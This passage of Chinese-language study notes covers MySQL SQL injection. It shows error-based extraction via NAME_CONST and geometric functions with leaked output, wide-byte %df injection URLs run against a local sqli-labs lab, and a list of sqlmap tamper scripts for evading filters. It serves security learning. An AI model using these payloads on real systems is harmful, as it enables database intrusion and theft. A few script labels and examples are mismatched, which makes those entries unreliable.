<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;</span><br><span class="line">ERROR 1060 (42S21): Duplicate column name &apos;5.5.36-log&apos;</span><br></pre></td></tr></table></figure>

<p>利用这个特性加上join函数可以爆列名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from(select * from users a join users b)c;</span><br><span class="line">ERROR 1060 (42S21): Duplicate column name &apos;id&apos;</span><br><span class="line">mysql&gt; select * from(select * from users a join users b using(id))c;</span><br><span class="line">ERROR 1060 (42S21): Duplicate column name &apos;username&apos;</span><br><span class="line">mysql&gt; select * from(select * from users a join users b using(id,username))c;</span><br><span class="line">ERROR 1060 (42S21): Duplicate column name &apos;password&apos;</span><br></pre></td></tr></table></figure>

<p>注入实例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos;union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --</span><br></pre></td></tr></table></figure>

<p><strong>几何函数</strong></p>
<blockquote>
<p>mysql有些几何函数，例如geometrycollection()，multipoint()，polygon()，multipolygon()，linestring()，multilinestring()，这些函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据，如果不满足要求，则会报错。经测试，在版本号为5.5.47上可以用来注入，而在5.7.17上则不行，不同的函数情况版本情况可能不一样。</p>
</blockquote>
<p><strong>（1）geometrycollection()</strong></p>
<p>GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系（即相同的坐标系）。对GeometryCollection的元素无任何限制。攻击载荷查询的为一串字符,然后用处理geometrycollection(),由于MYSQL无法用这样字符串画出图形,所以报错了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select geometrycollection((select * from(select * from(select user())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`user()` from (select &apos;root@localhost&apos; AS `user()` from dual) `b`)&apos; value found during parsing</span><br><span class="line">mysql&gt; select geometrycollection((select * from(select * from(select database())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`database()` from (select &apos;security&apos; AS `database()` from dual) `b`)&apos; value found during parsing</span><br><span class="line">mysql&gt; select geometrycollection((select * from(select * from(select concat(table_schema, &apos;:&apos;,table_name) from information_schema.tables limit 0,1)a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`concat(table_schema, &apos;:&apos;,table_name)` from (select &apos;information_schema:CHARACTER_SETS&apos; AS `concat(table_schema, &apos;:&apos;,table_name)` from dual) `b`)&apos; value found during parsing</span><br><span class="line">mysql&gt; select geometrycollection((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;)a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`group_concat(table_name)` from (select &apos;emails,referers,uagents,users&apos; AS `group_concat(table_name)` from dual) `b`)&apos; value found during parsing</span><br></pre></td></tr></table></figure>

<p><strong>注入实例：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; and geometrycollection((select * from(select * from(select database())a)b)) -- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union select geometrycollection((select * from(select * from(select database())a)b)),2,3 -- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; and geometrycollection((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;)a)b))-- </span><br><span class="line">http://192.168.100.8/sqli-labs/Less-5/?id=1&apos; union geometrycollection((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema=&apos;security&apos;)a)b)),2,3--</span><br></pre></td></tr></table></figure>

<p><strong>multipoint()</strong></p>
<p>MultiPoint是一种由Point元素构成的几何对象集合。这些点未以任何方式连接或排序。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select multipolygon((select * from(select * from(select user())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`user()` from (select &apos;root@localhost&apos; AS `user()` from dual) `b`)&apos; value found during parsing</span><br></pre></td></tr></table></figure>

<p> 其余用法同geometrycollection()。</p>
<p><strong>polygon()</strong></p>
<p>Polygon是代表多边几何对象的平面Surface。它由单个外部边界以及0或多个内部边界定义，其中，每个内部边界定义为Polygon中的1个孔。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select polygon((select * from(select * from(select user())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`user()` from (select &apos;root@localhost&apos; AS `user()` from dual) `b`)&apos; value found during parsing</span><br></pre></td></tr></table></figure>

<p> 其余用法同geometrycollection()。</p>
<p><strong>multipolygon()</strong></p>
<p>multipolygon()是一种由Polygon元素构成的几何对象集合。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select multipolygon((select * from(select * from(select user())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`user()` from (select &apos;root@localhost&apos; AS `user()` from dual) `b`)&apos; value found during parsing</span><br></pre></td></tr></table></figure>

<p>其余用法同geometrycollection()。</p>
<p><strong>linestring()</strong></p>
<p>LineString()是具有点之间线性内插特性的Curve。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select linestring((select * from(select * from(select user())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`user()` from (select &apos;root@localhost&apos; AS `user()` from dual) `b`)&apos; value found during parsing</span><br></pre></td></tr></table></figure>

<p>其余用法同geometrycollection()。</p>
<p><strong>multilinestring()</strong></p>
<p>multilinestring()是一种由LineStirng元素构成的MultiCurve几何对象集合。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select multilinestring((select * from(select * from(select user())a)b));</span><br><span class="line">ERROR 1367 (22007): Illegal non geometric &apos;(select `b`.`user()` from (select &apos;root@localhost&apos; AS `user()` from dual) `b`)&apos; value found during parsing</span><br></pre></td></tr></table></figure>

<p>其余用法同geometrycollection()。</p>
<h2 id="0x04-宽字节注入"><a href="#0x04-宽字节注入" class="headerlink" title="0x04 宽字节注入"></a>0x04 宽字节注入</h2><h3 id="4-1-注入原理"><a href="#4-1-注入原理" class="headerlink" title="4.1 注入原理"></a>4.1 注入原理</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1.当某字符的大小为一个字节时，称其字符为窄字节.</span><br><span class="line"></span><br><span class="line">2.当某字符的大小为两个字节时，称其字符为宽字节.</span><br><span class="line"></span><br><span class="line">3.所有英文默认占一个字节，汉字占两个字节</span><br><span class="line"></span><br><span class="line">4.常见的宽字节编码：GB2312,GBK,GB18030,BIG5,Shift_JIS等等</span><br></pre></td></tr></table></figure>

<p>GBK 占用两字节，ASCII占用一字节</p>
<p>程序员为了防止sql注入，对用户输入中的单引号  <code>&#39;</code>  进行处理，在单引号前加上斜杠 <code>\</code>进行转义，这样被处理后的sql语句中，单引号不再具有  <code>&#39;  &#39;</code>  作用，仅仅是<code>内容</code>而已，换句话说，这个单引号<strong>无法发挥和前后单引号闭合的作用，仅仅成为内容</strong></p>
<p>再举个例子，要找某位名字里带单引号的用户，搜索的时候，就要让单引号成为内容去搜索，而不能起到其他作用</p>
<p><strong>而安全测试人员要绕过这个转义处理，使单引号发挥作用，有两个思路：</strong></p>
<p>第一个思路就是借鉴程序员的防范思路，对斜杠（\）转义，使其失去转义单引号的作用，成为‘内容’</p>
<p>第二个思路就是<strong>宽字节注入</strong></p>
<p><img src="/2019/09/19/第六周：数据库相关注入语句的收集和学习/1335588-20190323124213653-1124895243.png" alt="1335588-20190323124213653-1124895243"></p>
<p>当使用宽字节编码，如：GBK时，两个连在一起的字符会被认为是汉字，我们可以在单引号前加一个字符，使其和斜杠（\）组合被认为成汉字，从未达到让斜杠消失的目的，进而使单引号发挥作用</p>
<p><strong>注意：</strong>前一个字符的Ascii要大于128，两个字符才能组合成汉字</p>
<h3 id="4-2-在sqli-labs上用宽字节注入实战"><a href="#4-2-在sqli-labs上用宽字节注入实战" class="headerlink" title="4.2 在sqli-labs上用宽字节注入实战"></a>4.2 在sqli-labs上用宽字节注入实战</h3><p><strong>第三十二关</strong></p>
<p>宽字节注入，单引号闭合。</p>
<p><strong>本来原始页面是这样的：</strong></p>
<p><img src="/2019/09/19/第六周：数据库相关注入语句的收集和学习/1568897978843.png" alt="1568897978843"></p>
<p><strong>在url后加上<code>?id=1&#39;</code>后提示单引号 <code>&#39;</code> 被转义了，由此我们想到利用宽字节注入</strong><img src="/2019/09/19/第六周：数据库相关注入语句的收集和学习/1568898108689.png" alt="1568898108689"></p>
<p><strong>在单引号前面加上%df  报错了，说明单引号闭合成功！</strong></p>
<p><img src="/2019/09/19/第六周：数据库相关注入语句的收集和学习/1568898247396.png" alt="1568898247396"></p>
<p><strong>数据库：</strong><br><code>?id=1.1%df&#39; union select 1,2,group_concat(schema_name) from information_schema.schemata --+</code><br><strong>数据表：</strong><br><code>?id=1.1%df&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</code></p>
<p>再多说一下字段名，因为查询字段的时候要有where table_name=’user’，注意，user用引号括起来，但是会被转义：因为没有表叫user�\。所以这里要把表名转换成16进制进行绕过（转换之前不用加引号，只转换表名就好了），然后写注入语句的时候在16进制的表名前再加个0x，user转换成16进制是75736572。<br><strong>字段名：</strong><br><code>?id=1.1%df&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x75736572 --+</code></p>
<p><a href="https://www.cnblogs.com/Rain99-/p/10583406.html" target="_blank" rel="noopener">参考文章：宽字节注入</a></p>
<p><a href="https://www.jianshu.com/p/123c01cf4f96" target="_blank" rel="noopener">参考文章：sqli-labs level32-37 宽字节注入</a></p>
<h2 id="0x05-sqlmap-自带-tamper-的原理"><a href="#0x05-sqlmap-自带-tamper-的原理" class="headerlink" title="0x05   sqlmap 自带 tamper 的原理"></a>0x05   sqlmap 自带 tamper 的原理</h2><p><strong>sqlmap tamper的命令如下</strong></p>
<p>sqlmap -u [url] –tamper [模块名]</p>
<h3 id="5-1-常用tamper脚本"><a href="#5-1-常用tamper脚本" class="headerlink" title="5.1 常用tamper脚本"></a>5.1 常用tamper脚本</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br></pre></td><td class="code"><pre><span class="line">apostrophemask.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：将引号替换为utf-8，用于过滤单引号 </span><br><span class="line">使用脚本前：tamper(&quot;1 AND &apos;1&apos;=&apos;1&quot;) </span><br><span class="line">使用脚本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871</span><br><span class="line"></span><br><span class="line">base64encode.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：替换为base64编码 </span><br><span class="line">使用脚本前：tamper(&quot;1&apos; AND SLEEP(5)#&quot;) </span><br><span class="line">使用脚本后：MScgQU5EIFNMRUVQKDUpIw==</span><br><span class="line"></span><br><span class="line">multiplespaces.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：围绕sql关键字添加多个空格 </span><br><span class="line">使用脚本前：tamper(&apos;1 UNION SELECT foobar&apos;) </span><br><span class="line">使用脚本后：1 UNION SELECT foobar</span><br><span class="line"></span><br><span class="line">space2plus.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：用加号替换空格 </span><br><span class="line">使用脚本前：tamper(&apos;SELECT id FROM users&apos;) </span><br><span class="line">使用脚本后：SELECT+id+FROM+users</span><br><span class="line"></span><br><span class="line">nonrecursivereplacement.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：作为双重查询语句，用双重语句替代预定义的sql关键字（适用于非常弱的自定义过滤器，例如将select替换为空） </span><br><span class="line">使用脚本前：tamper(&apos;1 UNION SELECT 2--&apos;) </span><br><span class="line">使用脚本后：1 UNIOUNIONN SELESELECTCT 2--</span><br><span class="line"></span><br><span class="line">space2randomblank.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：将空格替换为其他有效字符 </span><br><span class="line">使用脚本前：tamper(&apos;SELECT id FROM users&apos;) </span><br><span class="line">使用脚本后：SELECT%0Did%0DFROM%0Ausers</span><br><span class="line"></span><br><span class="line">unionalltounion.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：将union allselect 替换为unionselect </span><br><span class="line">使用脚本前：tamper(&apos;-1 UNION ALL SELECT&apos;) </span><br><span class="line">使用脚本后：-1 UNION SELECT</span><br><span class="line"></span><br><span class="line">securesphere.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：追加特定的字符串 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 1=1&apos;) </span><br><span class="line">使用脚本后：1 AND 1=1 and &apos;0having&apos;=&apos;0having&apos;</span><br><span class="line"></span><br><span class="line">space2dash.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：将空格替换为--，并添加一个随机字符串和换行符 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 9227=9227&apos;) </span><br><span class="line">使用脚本后：1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227</span><br><span class="line"></span><br><span class="line">space2mssqlblank.py</span><br><span class="line">适用数据库：Microsoft SQL Server </span><br><span class="line">测试通过数据库：Microsoft SQL Server 2000、Microsoft SQL Server 2005 </span><br><span class="line">作用：将空格随机替换为其他空格符号(&apos;%01&apos;, &apos;%02&apos;, &apos;%03&apos;, &apos;%04&apos;, &apos;%05&apos;, &apos;%06&apos;, &apos;%07&apos;, &apos;%08&apos;, &apos;%09&apos;, &apos;%0B&apos;, &apos;%0C&apos;, &apos;%0D&apos;, &apos;%0E&apos;, &apos;%0F&apos;, &apos;%0A&apos;) </span><br><span class="line">使用脚本前：tamper(&apos;SELECT id FROM users&apos;) </span><br><span class="line">使用脚本后：SELECT%0Eid%0DFROM%07users</span><br><span class="line"></span><br><span class="line">between.py</span><br><span class="line">测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 </span><br><span class="line">作用：用NOT BETWEEN 0 AND #替换&gt; </span><br><span class="line">使用脚本前：tamper(&apos;1 AND A &gt; B--&apos;) </span><br><span class="line">使用脚本后：1 AND A NOT BETWEEN 0 AND B--</span><br><span class="line"></span><br><span class="line">percentage.py</span><br><span class="line">适用数据库：ASP </span><br><span class="line">测试通过数据库：Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0 </span><br><span class="line">作用：在每个字符前添加一个% </span><br><span class="line">使用脚本前：tamper(&apos;SELECT FIELD FROM TABLE&apos;) </span><br><span class="line">使用脚本后：%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E</span><br><span class="line"></span><br><span class="line">sp_password.py</span><br><span class="line">适用数据库：MSSQL </span><br><span class="line">作用：从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 9227=9227-- &apos;) </span><br><span class="line">使用脚本后：1 AND 9227=9227-- sp_password</span><br><span class="line"></span><br><span class="line">charencode.py</span><br><span class="line">测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 </span><br><span class="line">作用：对给定的payload全部字符使用url编码（不处理已经编码的字符） </span><br><span class="line">使用脚本前：tamper(&apos;SELECT FIELD FROM%20TABLE&apos;) </span><br><span class="line">使用脚本后：%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45</span><br><span class="line"></span><br><span class="line">randomcase.py</span><br><span class="line">测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 </span><br><span class="line">作用：随机大小写 </span><br><span class="line">使用脚本前：tamper(&apos;INSERT&apos;) </span><br><span class="line">使用脚本后：INseRt</span><br><span class="line"></span><br><span class="line">charunicodeencode.py</span><br><span class="line">适用数据库：ASP、ASP.NET </span><br><span class="line">测试通过数据库：Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3 </span><br><span class="line">作用：适用字符串的unicode编码 </span><br><span class="line">使用脚本前：tamper(&apos;SELECT FIELD%20FROM TABLE&apos;) </span><br><span class="line">使用脚本后：%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045</span><br><span class="line"></span><br><span class="line">space2comment.py</span><br><span class="line">测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 </span><br><span class="line">作用：将空格替换为/**/ </span><br><span class="line">使用脚本前：tamper(&apos;SELECT id FROM users&apos;) </span><br><span class="line">使用脚本后：SELECT/**/id/**/FROM/**/users</span><br><span class="line"></span><br><span class="line">equaltolike.py</span><br><span class="line">测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5 </span><br><span class="line">作用：将=替换为LIKE </span><br><span class="line">使用脚本前：tamper(&apos;SELECT * FROM users WHERE id=1&apos;) </span><br><span class="line">使用脚本后：SELECT * FROM users WHERE id LIKE 1</span><br><span class="line"></span><br><span class="line">equaltolike.py</span><br><span class="line">测试通过数据库：MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0 </span><br><span class="line">作用：将&gt;替换为GREATEST，绕过对&gt;的过滤 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND A &gt; B&apos;) </span><br><span class="line">使用脚本后：1 AND GREATEST(A,B+1)=A</span><br><span class="line"></span><br><span class="line">ifnull2ifisnull.py</span><br><span class="line">适用数据库：MySQL、SQLite (possibly)、SAP MaxDB (possibly) </span><br><span class="line">测试通过数据库：MySQL 5.0 and 5.5 </span><br><span class="line">作用：将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A)，绕过对IFNULL的过滤 </span><br><span class="line">使用脚本前：tamper(&apos;IFNULL(1, 2)&apos;) </span><br><span class="line">使用脚本后：IF(ISNULL(1),2,1)</span><br><span class="line"></span><br><span class="line">modsecurityversioned.py</span><br><span class="line">适用数据库：MySQL </span><br><span class="line">测试通过数据库：MySQL 5.0 </span><br><span class="line">作用：过滤空格，使用mysql内联注释的方式进行注入 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 2&gt;1--&apos;) </span><br><span class="line">使用脚本后：1 /*!30874AND 2&gt;1*/--</span><br><span class="line"></span><br><span class="line">space2mysqlblank.py</span><br><span class="line">适用数据库：MySQL </span><br><span class="line">测试通过数据库：MySQL 5.1 </span><br><span class="line">作用：将空格替换为其他空格符号(&apos;%09&apos;, &apos;%0A&apos;, &apos;%0C&apos;, &apos;%0D&apos;, &apos;%0B&apos;) </span><br><span class="line">使用脚本前：tamper(&apos;SELECT id FROM users&apos;) </span><br><span class="line">使用脚本后：SELECT%0Bid%0DFROM%0Cusers</span><br><span class="line"></span><br><span class="line">modsecurityzeroversioned.py</span><br><span class="line">适用数据库：MySQL </span><br><span class="line">测试通过数据库：MySQL 5.0 </span><br><span class="line">作用：使用内联注释方式（/*!00000*/）进行注入 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 2&gt;1--&apos;) </span><br><span class="line">使用脚本后：1 /*!00000AND 2&gt;1*/--</span><br><span class="line"></span><br><span class="line">space2mysqldash.py</span><br><span class="line">适用数据库：MySQL、MSSQL </span><br><span class="line">作用：将空格替换为 -- ，并追随一个换行符 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 9227=9227&apos;) </span><br><span class="line">使用脚本后：1--%0AAND--%0A9227=9227</span><br><span class="line"></span><br><span class="line">bluecoat.py</span><br><span class="line">适用数据库：Blue Coat SGOS </span><br><span class="line">测试通过数据库：MySQL 5.1,、SGOS </span><br><span class="line">作用：在sql语句之后用有效的随机空白字符替换空格符，随后用LIKE替换= </span><br><span class="line">使用脚本前：tamper(&apos;SELECT id FROM users where id = 1&apos;) </span><br><span class="line">使用脚本后：SELECT%09id FROM users where id LIKE 1</span><br><span class="line"></span><br><span class="line">versionedkeywords.py</span><br><span class="line">适用数据库：MySQL </span><br><span class="line">测试通过数据库：MySQL 4.0.18, 5.1.56, 5.5.11 </span><br><span class="line">作用：注释绕过 </span><br><span class="line">使用脚本前：tamper(&apos;1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#&apos;) </span><br><span class="line">使用脚本后：1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#</span><br><span class="line"></span><br><span class="line">halfversionedmorekeywords.py</span><br><span class="line">适用数据库：MySQL &lt; 5.1 </span><br><span class="line">测试通过数据库：MySQL 4.0.18/5.0.22 </span><br><span class="line">作用：在每个关键字前添加mysql版本注释 </span><br><span class="line">使用脚本前：tamper(&quot;value&apos; UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND &apos;QDWa&apos;=&apos;QDWa&quot;) </span><br><span class="line">使用脚本后：value&apos;/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND &apos;QDWa&apos;=&apos;QDWa</span><br><span class="line"></span><br><span class="line">space2morehash.py</span><br><span class="line">适用数据库：MySQL &gt;= 5.1.13 </span><br><span class="line">测试通过数据库：MySQL 5.1.41 </span><br><span class="line">作用：将空格替换为#，并添加一个随机字符串和换行符 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 9227=9227&apos;) </span><br><span class="line">使用脚本后：1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227</span><br><span class="line"></span><br><span class="line">apostrophenullencode.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：用非法双字节Unicode字符替换单引号 </span><br><span class="line">使用脚本前：tamper(&quot;1 AND &apos;1&apos;=&apos;1&quot;) </span><br><span class="line">使用脚本后：1 AND %00%271%00%27=%00%271</span><br><span class="line"></span><br><span class="line">appendnullbyte.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：在有效载荷的结束位置加载null字节字符编码 </span><br><span class="line">使用脚本前：tamper(&apos;1 AND 1=1&apos;) </span><br><span class="line">使用脚本后：1 AND 1=1%00</span><br><span class="line"></span><br><span class="line">chardoubleencode.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：对给定的payload全部字符使用双重url编码（不处理已经编码的字符） </span><br><span class="line">使用脚本前：tamper(&apos;SELECT FIELD FROM%20TABLE&apos;) </span><br><span class="line">使用脚本后：%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545</span><br><span class="line"></span><br><span class="line">unmagicquotes.py</span><br><span class="line">适用数据库：ALL </span><br><span class="line">作用：用一个多字节组合%bf%27和末尾通用注释一起替换空格 </span><br><span class="line">使用脚本前：tamper(&quot;1&apos; AND 1=1&quot;) </span><br><span class="line">使用脚本后：1%bf%27 AND 1=1--</span><br><span class="line"></span><br><span class="line">randomcomments.py</span><br><span class="line">适用数据库：ALL </span><br><span 